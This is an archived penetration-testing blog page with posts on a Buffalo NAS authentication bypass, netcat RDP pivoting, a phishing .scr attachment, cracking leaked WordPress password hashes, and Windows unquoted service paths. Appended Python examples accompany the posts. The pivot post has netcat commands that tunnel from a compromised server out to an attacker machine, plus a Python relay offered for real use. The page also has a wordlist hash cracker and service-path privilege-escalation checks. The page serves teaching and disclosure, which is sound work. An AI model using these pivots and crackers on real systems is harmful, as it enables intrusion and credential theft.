A blog about generally interesting infosec stuff by Darren Fuller/Paul Marsh, SecQuest Information Security https://www.secquest.co.uk

Friday, 16 October 2015

Security Advisory: Buffalo NAS Authentication Bypass

Security Advisory
Buffalo LinkStation/TeraStation Authentication Bypass 

Manufacturer: Buffalo Technology - http://www.buffalotech.com
Affected Products: LinkStation/TeraStation NAS Devices
Affected Firmware: Seen in 1.69 and below 
Fixed Firmware: 1.71
Risk: Critical data loss/access to sensitive information
Vendor Status: Firmware Update Released

General Information
During a client penetration test, SecQuest consultants found that it was possible to bypass authentication on Buffalo NAS devices by modifying the response to the login request.

This allows full access at administrator level giving complete control of the device. Using the admin interface it is possible to add a new user and open the device up for remote file sharing via Buffalo's "webaccess" functionality.

This would give access to all data contained on the device. A malicious attacker could alternatively format the storage or delete RAID arrays potentially resulting in data loss.

The server's response to the login POST to /dynamic.pl can be modified in an intercepting proxy so that ANY username and password are accepted: the device's web interface decides what to show next from the "success" and "pagemode" values in that response, so changing them as follows is enough:

Original response

Modified response

Vulnerability confirmed in firmware versions 1.10, 1.15, 1.34, 1.41, 1.50, 1.52, 1.56, 1.59, 1.60, 1.63, 1.64, 1.65, 1.66, 1.68, 1.69
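To make the bug class concrete, here is a small model of a login flow that trusts "success"/"pagemode" values which originate in the login response, next to the fix. This is an added example, not SecQuest's or Buffalo's code, and it does not describe the firmware's real internals: the handler names, the field layout, the session scheme and the sample credential are assumptions chosen to show why editing the response in a proxy works and why a server-side session record is the cure.

```python
"""Model of the bug class behind the advisory.

Added example (not SecQuest's or Buffalo's code). The handler names, the
"success"/"pagemode" layout, the session scheme and USERS are assumptions.
"""
import secrets

USERS = {"admin": "correct-horse-battery"}   # constructed sample credential


class VulnerableDevice:
    """Login returns success/pagemode; later pages trust the client's copy.

    Authorisation is decided from values the browser sends back, and the
    browser got them from the login response, which a proxy can rewrite.
    """

    def login(self, user, password):
        if USERS.get(user) == password:
            return {"success": 1, "pagemode": "admin"}
        return {"success": 0, "pagemode": "login"}

    def admin_page(self, client_state):
        if client_state.get("success") == 1 and client_state.get("pagemode") == "admin":
            return "ADMIN PANEL"
        return "LOGIN FORM"


class HardenedDevice:
    """Login mints an unguessable session id; authorisation is looked up server-side.

    The client may still see (and edit) success/pagemode, but they no longer
    decide anything: only a session the server itself created does.
    """

    def __init__(self):
        self._sessions = {}

    def login(self, user, password):
        if USERS.get(user) == password:
            sid = secrets.token_urlsafe(32)
            self._sessions[sid] = {"user": user, "role": "admin"}
            return {"success": 1, "pagemode": "admin", "sid": sid}
        return {"success": 0, "pagemode": "login"}

    def admin_page(self, client_state):
        session = self._sessions.get(client_state.get("sid", ""))
        if session is not None and session["role"] == "admin":
            return "ADMIN PANEL"
        return "LOGIN FORM"


def proxy_rewrite(response):
    """What the intercepting proxy does: make a failed login look successful."""
    forged = dict(response)
    forged["success"] = 1
    forged["pagemode"] = "admin"
    return forged


def attack(device, user="anyone", password="anything"):
    """Log in with junk credentials, tamper with the response, ask for the admin page."""
    browser_state = proxy_rewrite(device.login(user, password))
    return device.admin_page(browser_state)


def legitimate(device, user="admin", password="correct-horse-battery"):
    """Control case: a real login must still work on the hardened device."""
    return device.admin_page(device.login(user, password))


if __name__ == "__main__":
    print("vulnerable:", attack(VulnerableDevice()))   # ADMIN PANEL
    print("hardened:  ", attack(HardenedDevice()))     # LOGIN FORM
```

The point of the hardened version is not the extra field but where the decision is made: every privileged request is checked against state the server created and the client cannot forge, regardless of what the login response said.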

Discovered by Darren Fuller (darren [at] secquest.co.uk)

Independently discovered by Red Team Pentesting.

16-Oct-2015 Exploit is in the wild, blog post published
07-Jul-2015 Vendor has no update from engineering team
25-Jun-2015 Update requested from vendor
06-Mar-2015 Vendor is liaising with engineering team in Japan
04-Mar-2015 Update requested from vendor
22-Jan-2015 Technical team confirms vulnerability, fix being created
19-Jan-2015 Update requested from vendor
05-Jan-2015 Update requested from vendor
23-Dec-2014 Vulnerability information passed on to vendor
16-Dec-2014 Alternate contact at vendor requested
16-Dec-2014 Vendor response, case reference ID: 0-80368
15-Dec-2014 Vendor contacted via web support form

Wednesday, 4 March 2015

Pivoting RDP with Netcat

Whilst on a recent test we managed to get a simple PHP command shell uploaded to a web server which was running Linux. We found some information about back-end Windows systems including credentials and needed a way of getting remote desktop access.

This subject has been discussed previously but we thought we'd document it again as it's a cool trick!

The network looked a bit like this for our purposes:
Our hacker is connected to the webserver, on which we have a PHP command shell. We know there are Windows boxes on the back-end, so we needed a way to tunnel comms through to them. At this point we could have used something like Meterpreter, but we wanted a quick and dirty solution that didn't involve creating or uploading files. Fortunately the system had netcat installed!

So firstly we needed netcat to listen on TCP port 53 (the DNS port) for comms from the WWW server (we'd worked out that the firewall allowed 53 outbound from the webserver). Getting the server to initiate the connection is more polite than opening up a remote port!

The following command, run on our laptop, listens on TCP 53; when the WWW server connects, netcat hands that connection to a second netcat instance which listens locally on the RDP port, 3389. The inner command has to be given to -e as a single quoted argument, and this only works with a netcat whose -e runs a command line: GNU netcat passes the argument to /bin/sh -c, nc.traditional's -e takes a bare program path with no arguments (so there the inner nc would go in a small script), the OpenBSD nc has no -e at all, and Ncat's equivalent is --sh-exec.

nc -l -p 53 -e "nc -l -p 3389"

From the PHP command shell we had on the WWW server we then ran the following command (the destination port is a positional argument; on an outbound connection -p would set the local source port, not the port we are connecting to):

nc hacker-laptop 53 -e "nc windows-server 3389"

This caused the WWW server to create an outbound connection to our laptop which in turn started another listener locally on TCP 3389:

It also created a connection between the WWW server and the Windows server:

So by RDP'ing to localhost the connection was channeled over netcat through the WWW server and on to the RDP port of the Windows server, game over followed shortly!

Again, proof that netcat rocks!
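For a foothold where nc has no -e (the OpenBSD build) or the exec argument can't be quoted, the same two relays are a few lines of Python. This is an added example, not SecQuest's code. The role names are the post's ("laptop", "webserver", "target"); demo() is test scaffolding that runs all three roles on loopback with OS-chosen ports instead of 53 and 3389 and an echo socket in place of the RDP service, so the chain can be exercised without a network.

```python
"""Python stand-in for the two netcat relays in the post.
Added example, not SecQuest's code; demo() and its loopback ports/echo socket are assumptions."""
import socket
import threading


def pump(src, dst):
    """Copy bytes src -> dst until EOF, then pass the EOF on to dst's peer."""
    try:
        while True:
            chunk = src.recv(65536)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def bridge(a, b):
    """Full-duplex relay between two connected sockets; returns when both directions are done."""
    threads = [threading.Thread(target=pump, args=(a, b)),
               threading.Thread(target=pump, args=(b, a))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    a.close()
    b.close()


def listen_on(port, host="127.0.0.1"):
    """Bound, listening TCP socket (port 0 lets the OS pick one)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(1)
    return s


def webserver_side(laptop_host, laptop_port, target_host, target_port):
    """Equivalent of: nc hacker-laptop 53 -e "nc windows-server 3389" (run via the PHP shell).
    Dial out to the laptop first (the direction the firewall allows), then the internal target."""
    to_laptop = socket.create_connection((laptop_host, laptop_port))
    to_target = socket.create_connection((target_host, target_port))
    bridge(to_laptop, to_target)


def laptop_side(outer, local):
    """Equivalent of: nc -l -p 53 -e "nc -l -p 3389" (run on the laptop).
    `outer`/`local` come from listen_on(); accept the webserver's call-in, then the
    RDP client, and splice them. Like nc -l, each listener serves exactly one connection."""
    from_web, _ = outer.accept()
    outer.close()
    rdp_client, _ = local.accept()
    local.close()
    bridge(from_web, rdp_client)


def demo(probe=b"RDP-HELLO"):
    """Run all three roles on loopback, push `probe` through the chain and
    return what came back from the 'target' (an echo socket standing in for RDP)."""
    target, outer, local = listen_on(0), listen_on(0), listen_on(0)
    target_port, outer_port, local_port = (s.getsockname()[1] for s in (target, outer, local))

    def echo_target():                      # stands in for windows-server:3389
        conn, _ = target.accept()
        target.close()
        while True:
            chunk = conn.recv(65536)
            if not chunk:
                break
            conn.sendall(chunk)
        conn.close()

    roles = [threading.Thread(target=echo_target),
             threading.Thread(target=laptop_side, args=(outer, local)),
             threading.Thread(target=webserver_side,
                              args=("127.0.0.1", outer_port, "127.0.0.1", target_port))]
    for t in roles:
        t.start()

    # The RDP client: connect to the laptop's local port, as mstsc would to localhost:3389.
    client = socket.create_connection(("127.0.0.1", local_port))
    client.sendall(probe)
    client.shutdown(socket.SHUT_WR)
    reply = b""
    while True:
        chunk = client.recv(65536)
        if not chunk:
            break
        reply += chunk
    client.close()
    for t in roles:
        t.join(timeout=5)
    return reply


if __name__ == "__main__":
    print(demo())
```

In real use you would run webserver_side() from the compromised host and laptop_side() with listen_on(53) and listen_on(3389) on your own machine; demo() only exists so the relay logic can be checked end to end on one box.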

Friday, 9 May 2014

Lloyds Bank "PCI DSS" Malware

In common with the Facebook scam post earlier, we don't usually bother blogging about malware and phishing emails as they're usually handled well by companies and are pretty common, but this email was a bit more interesting.

We had an email from "Lloyds Bank" <pciportal@lloydsbankcardnetpcidss.com> entitled PCI DSS Compliance Programme:
Looks pretty legit... PCI too, that's a security thing, isn't it! The attachment looked like this:

So, a PDF icon with a .scr suffix. A .scr file is a Windows screensaver, which is just an ordinary executable under another extension: double-clicking it runs the code exactly as a .exe would (for our younger viewers).

Basically it's a known piece of malware with reasonable detection according to Virus Total:

Interesting all the same, obviously targeted at business rather than end user targets. Be vigilant!
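The two tells in this attachment (an executable extension, and a document extension buried in front of it) plus the file's first bytes are enough to triage such things automatically. Here is an added check to do that; it is not SecQuest's code, and the sample attachment names and header bytes below are constructed for the example rather than taken from the real email.

```python
"""Attachment triage for "document that is really an executable".
Added example, not SecQuest's code; SAMPLES are constructed."""
import os

# Extensions Windows will execute on double-click. .scr (screensaver) is a
# plain PE file and runs exactly like .exe.
EXECUTABLE_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd",
                         ".vbs", ".js", ".jse", ".wsf", ".hta", ".msi", ".cpl"}
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}


def triage_attachment(filename, head=b""):
    """Return the reasons to distrust the attachment (empty list = nothing found).

    `head` is the first few bytes of the file, so a PE renamed to .pdf is
    caught even when the filename on its own looks innocent.
    """
    reasons = []
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext in EXECUTABLE_EXTENSIONS:
        reasons.append("executable extension " + ext)
    # "invoice.pdf.scr": a document extension placed in front of the real one.
    if len(parts) > 2 and "." + parts[-2] in DOCUMENT_EXTENSIONS:
        reasons.append("double extension hides ." + parts[-2] + " before " + ext)
    # PE files start with "MZ"; PDFs start with "%PDF".
    if head[:2] == b"MZ" and ext not in EXECUTABLE_EXTENSIONS:
        reasons.append("PE header but non-executable extension " + (ext or "(none)"))
    if ext == ".pdf" and head and not head.startswith(b"%PDF"):
        reasons.append(".pdf extension but no %PDF signature")
    return reasons


# Constructed samples: the first mimics the PDF-iconed .scr in the post,
# the second is a genuine-looking PDF, the third a PE renamed to .pdf.
SAMPLES = {
    "PCI_DSS_Compliance.pdf.scr": b"MZ\x90\x00\x03\x00\x00\x00",
    "Compliance_Programme.pdf": b"%PDF-1.4\n",
    "report.pdf": b"MZ\x90\x00",
}

if __name__ == "__main__":
    for name, head in SAMPLES.items():
        print(name, "->", triage_attachment(name, head) or "ok")
```

Note that the icon is not something you can check from the filename; it is embedded in the PE's resources, which is exactly why the extension and the magic bytes are the things to look at.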

Wednesday, 9 April 2014

Trend Micro File Harvesting

Going back a year or two we blogged about Microsoft's SmartScreen filter sending potentially sensitive file information to Microsoft's servers, which then fetch files themselves after Internet Explorer has downloaded them. If you're putting super-secret-file.zip on a server for someone, you probably don't want anyone else coming along and hoovering it up!

We've recently become aware that some versions of Trend antivirus products do exactly the same.

Sunday, 16 February 2014

Forbes Cracked Passwords from Feb 2014

Did a really quick analysis of the Forbes password hashes leaked by the Syrian Electronic Army earlier. From the 1,071,734 password hashes that hashcat recognised as WordPress, 2713 were cracked in about 30 minutes.

There were no switches, GPUs, rules or anything used; I just used the unedited top 25 passwords from the top 10,000 list published by Mark Burnett (xato.net).

The results show that 975 people have 123456 as a password... some things never change! The 25 cracked passwords, by count, follow:

fully@SQ:~/hc$ cat forbescracked.txt|cut -d : -f 2| sort|uniq -c|sort -r -n
    975 123456
    534 password
    159 qwerty
    147 12345678
    146 abc123
    111 111111
     75 letmein
     66 monkey
     64 baseball
     62 1234567
     50 shadow
     35 michael
     32 jordan
     31 dragon
     29 superman
     29 master
     28 mustang
     28 football
     25 harley
     23 jennifer
     22 696969
     21 12345
     18 1234
      2 2000
      1 pussy
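"Recognised as WordPress" means the hashes were in phpass portable format, the salted, iterated MD5 scheme WordPress writes (hashcat's WordPress mode). The following is an added example, not SecQuest's code and not the Forbes data: it reimplements that scheme, runs a plain wordlist over a few hashes generated here from constructed passwords, and reproduces the cut | sort | uniq -c | sort -rn tally from the post, so the whole thing runs offline.

```python
"""phpass "$P$" (WordPress) hashing, a plain wordlist run, and the count tally.
Added example, not SecQuest's code; hashes are generated here from constructed passwords."""
import hashlib
import os

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(raw, count):
    """phpass' base-64 variant: little-endian 3-byte groups, no padding."""
    out = []
    i = 0
    while i < count:
        value = raw[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= raw[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= raw[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def _crypt_private(password, setting):
    """34-char phpass hash of `password` under `setting` ("$P$" + count char + 8-char salt,
    i.e. the first 12 characters of a stored hash)."""
    pw = password.encode()
    count_log2 = ITOA64.index(setting[3])
    salt = setting[4:12].encode()
    digest = hashlib.md5(salt + pw).digest()
    for _ in range(1 << count_log2):           # 2**count_log2 extra rounds
        digest = hashlib.md5(digest + pw).digest()
    return setting[:12] + _encode64(digest, 16)


def phpass_hash(password, count_log2=13, salt=None):
    """Hash as WordPress does: count_log2 = 13 gives the "$P$B" prefix (8192 rounds)."""
    if salt is None:
        salt = _encode64(os.urandom(6), 6)       # 8 characters, as phpass generates
    return _crypt_private(password, "$P$" + ITOA64[count_log2] + salt)


def check_password(password, stored):
    return _crypt_private(password, stored) == stored


def crack(hashes, wordlist):
    """Every word against every hash, no rules; returns {hash: password} for the hits.
    Each guess costs 2**13 + 1 MD5 calls per hash, which is why even 25 words
    against about a million hashes is a job measured in minutes on a CPU."""
    found = {}
    for h in hashes:
        for word in wordlist:
            if check_password(word, h):
                found[h] = word
                break
    return found


def top_counts(found):
    """Same tally as `cut -d : -f 2 | sort | uniq -c | sort -r -n` in the post."""
    counts = {}
    for pw in found.values():
        counts[pw] = counts.get(pw, 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    sample = [phpass_hash(p) for p in ["123456", "123456", "letmein", "not-in-the-list"]]
    hits = crack(sample, ["123456", "password", "qwerty", "letmein"])
    for pw, n in top_counts(hits):
        print(f"{n:7d} {pw}")
```

Because the salt is per-hash, a wordlist run cannot share work between hashes; the cost scales as hashes × words × rounds, which is the whole point of the iteration count.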

Thursday, 16 January 2014

Microsoft Windows Unquoted Service Path Exploit

It's been over a year since this Windows issue has had credentialed checks available in Nessus and it showed up again on a recent test. If you're not aware of the issue http://www.commonexploits.com/unquoted-service-paths/ has a great writeup and is referenced in the associated Nessus plugin (Nessus plugin ID 63155)

In a nutshell this vulnerability is due to the paths of some Windows services in the registry not being "enclosed with quotes". Believe it or not, when Windows sees an unquoted service path containing spaces, such as C:\Program Files\Test App\app.exe, it tries each of the following in turn and runs the first one that exists:

C:\Program.exe
C:\Program Files\Test.exe
C:\Program Files\Test App\app.exe

So if a low-privileged user can write into C:\ or C:\Program Files\, they can plant an executable that is started in place of the real service, in the service's own account (usually LocalSystem), the next time it starts, which for an auto-start service means the next reboot.

On the Common Exploits blog Daniel has given us a handy command to check for vulnerable services:

C:\>wmic service get name, displayname, pathname, startmode |findstr /i "auto"| findstr /i /v "c:\windows\\" | findstr /i /v """

I ran that on a system and got the following results:

CorsairSSDTool  CorsairSSDToolBox  C:\Program Files\Corsair SSD Toolbox\CSSDT Service.exe  Auto
Internet Pass-Through Service  PassThru Service  C:\Program Files\HTC\Internet Pass-Through\PassThruSvr.exe Auto

Metasploit has a privilege escalation module to take advantage of this, but we couldn't find a simple standalone way of demonstrating a proof of concept for the issue. Taking the easy option and copying cmd.exe into the path fails: it is not a proper Windows service application (it never reports in to the Service Control Manager, so the SCM times out the start and kills it), so we decided to write our own service to demo this!
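The wmic/findstr one-liner tells you which services are unquoted but not which files an attacker would actually have to plant. The following added example (not SecQuest's or Common Exploits' code) works that out: candidate_paths() enumerates the executables Windows tries for a path in the order given in the CreateProcess documentation, and vulnerable_services() runs it over wmic-style output. The SAMPLE_OUTPUT is constructed from the two results shown above plus one properly quoted control line.

```python
"""Candidate executables for an unquoted service path, and a check over wmic-style output.
Added example, not SecQuest's or Common Exploits' code; SAMPLE_OUTPUT is constructed."""
import re


def candidate_paths(image_path):
    """Executables Windows would try, in order, for a service ImagePath.

    A quoted path has exactly one candidate. An unquoted path with spaces is
    cut at each space: the text before the space plus ".exe" is tried first,
    then the next space, ending with the full path as written. Anything after
    the first ".exe" is treated as service arguments and ignored.
    """
    path = image_path.strip()
    if path.startswith('"'):
        return [path[1:path.index('"', 1)]]
    m = re.match(r"(?i)(.*?\.exe)(\s|$)", path)     # drop service arguments
    program = m.group(1) if m else path
    candidates = []
    for i, ch in enumerate(program):
        if ch == " ":
            candidates.append(program[:i] + ".exe")
    candidates.append(program)
    return candidates


def vulnerable_services(wmic_output):
    """Parse lines like those from `wmic service get name,displayname,pathname,startmode`
    and return (path, plantable-candidates) for auto-start services whose path
    gives an attacker somewhere to put a file. Paths under C:\\Windows\\ are
    skipped, matching the findstr chain in the post."""
    hits = []
    for line in wmic_output.splitlines():
        line = line.strip()
        if not line.lower().endswith("auto"):
            continue
        m = re.search(r'("?[A-Za-z]:\\.*?)\s+Auto$', line)
        if not m:
            continue
        path = m.group(1).strip()
        if path.lower().startswith("c:\\windows\\"):
            continue
        cands = candidate_paths(path)
        if len(cands) > 1:
            hits.append((path, cands[:-1]))          # everything but the real binary
    return hits


# Constructed sample modelled on the two results shown in the post, plus a quoted control.
SAMPLE_OUTPUT = """\
CorsairSSDTool  CorsairSSDToolBox  C:\\Program Files\\Corsair SSD Toolbox\\CSSDT Service.exe  Auto
Internet Pass-Through Service  PassThru Service  C:\\Program Files\\HTC\\Internet Pass-Through\\PassThruSvr.exe Auto
Quoted Service  QuotedSvc  "C:\\Program Files\\Vendor App\\svc.exe" -run  Auto
"""

if __name__ == "__main__":
    for path, plantable in vulnerable_services(SAMPLE_OUTPUT):
        print(path)
        for c in plantable:
            print("    attacker could plant:", c)
```

The remaining question for each candidate is whether a low-privileged user can create that file; on a live host that is an icacls check on the containing directory, which is where the real exposure (or lack of it) is decided.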

Monday, 9 December 2013

Facebook Badness

As an infosec company we don't tend to blog about Facebook scams such as "Free £100 Tesco voucher" or "Apple is giving away 1000 iPads because the boxes are scuffed" - surely a new box is cheaper + we'd be here all day tracing them!

However, this one piqued our interest as it is something that could just as well affect a company as an individual. This is pretty much a classic phishing exercise with a bit of social engineering thrown in for good measure; it's quite well executed though, so on with the details...

I had a private Facebook message from a family member come through which cc'd a number of other family members/friends. This is what the message looked like (blurred to protect the innocent!):

Alarm bells started ringing; a PM with a generic message along with a URL shortened using "t.co" which is a classic obfuscation technique.  The "Facebooky" looking thumbs up adds a certain amount of credibility as it was posted by another family member, surely they can be trusted, right?